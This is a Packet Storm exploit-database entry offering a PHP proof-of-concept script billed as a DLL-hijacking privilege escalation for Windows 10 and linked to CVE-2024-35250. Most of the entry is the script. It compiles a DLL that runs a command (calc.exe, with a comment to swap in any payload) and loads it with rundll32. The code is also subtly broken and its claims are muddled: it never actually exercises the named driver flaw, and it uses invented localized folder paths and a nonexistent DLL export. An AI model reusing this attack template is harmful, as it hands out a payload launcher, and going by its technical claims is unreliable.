PACKETSTORM 7.8 HIGH

📄 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317

December 2, 2025 invoker category_exploit
7.8 / 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation...
Visit Original Source

Basic Information

ID PACKETSTORM:212317
Published Dec 2, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.

There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.

[+] What's new in this version?

Added DLL Hijacking exploit inside the code

Create a malicious DLL library directly from inside the code

Use rundll32.exe to automatically load the payload

Ensure all possible environments are supported (Windows 10 and 11)

Improved compatibility with different languages

(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .


[+] Usage : php poc.php

[+] PayLoad :

<?php
/**
* استغلال ثغرة CVE-2024-35250 في Windows مع دعم جميع اللغات + DLL Hijacking
*/

function getWindowsLCID() {
$output = shell_exec('wmic os get locale /value');
preg_match('/Locale=(\w+)/', $output, $matches);
return isset($matches[1]) ? hexdec($matches[1]) : 1033; //
}

function localeToLanguage($locale) {
$languages = [
1033 => ['English', 'C:\\Users\\Public\\'], // en-US
1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
1114 => ['Aramaic', 'C:\\משתמשים\\ציבורי\\'], // الآرامية
1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
2052 => ['Chinese (Simplified)', 'C:\\用户\\公共\\'], // zh-CN
1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
];

return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; //
}

function getPublicPath() {
$locale = getWindowsLCID();
list($lang, $path) = localeToLanguage($locale);
echo "[+] لغة النظام: $lang (LCID: $locale)\n";
return $path;
}

function is64BitWindows() {
return (PHP_INT_SIZE === 8);
}

function checkVulnerableDriver() {
$winDir = getenv('WINDIR');
$driverPath = $winDir . '\\system32\\drivers\\ks.sys';

if (!file_exists($driverPath)) {
die("[X] لم يتم العثور على ks.sys، النظام غير قابل للاستغلال.\n");
}

echo "[+] ks.sys موجود في المسار: $driverPath\n";
return true;
}

function getWindowsBuildNumber() {
$output = shell_exec('wmic os get BuildNumber /value');
preg_match('/BuildNumber=(\d+)/', $output, $matches);
return $matches[1] ?? null;
}

function isVulnerableVersion($buildNumber) {
$vulnerableBuilds = range(14393, 19045); // من Windows 10 1607 إلى Windows 10 22H2
return in_array($buildNumber, $vulnerableBuilds);
}

function createMaliciousDLL($dllPath) {
$dllCode = <<<EOD
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd.exe /c calc.exe"); // استبدل calc.exe بأي حمولة تريد تنفيذها
}
return TRUE;
}
EOD;

file_put_contents("payload.c", $dllCode);
shell_exec("gcc -shared -o $dllPath payload.c -mwindows");
}

function exploit() {
if (!is64BitWindows()) {
die("[X] النظام ليس 64 بت، الاستغلال غير ممكن.\n");
}

if (!checkVulnerableDriver()) {
die("[X] لا يمكن متابعة الاستغلال.\n");
}

$buildNumber = getWindowsBuildNumber();
if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
die("[X] إصدار Windows غير مدعوم: $buildNumber\n");
}

echo "[+] تم التحقق من الثغرة، سيتم تنفيذ الهجوم الآن...\n";

$publicPath = getPublicPath();
$payloadPath = $publicPath . "exploit_payload.dll";

echo "[+] سيتم استخدام المسار: $payloadPath\n";

createMaliciousDLL($payloadPath);

echo "[+] تم إنشاء DLL الضارة بنجاح...\n";

$notepad = shell_exec('start /B notepad.exe'); // تشغيل notepad لاستضافة الـ DLL
sleep(1);

echo "[+] تم تشغيل Notepad، تنفيذ الحمولة...\n";
shell_exec("rundll32 $payloadPath,Inject"); // تحميل الحمولة عبر rundll32
}

exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.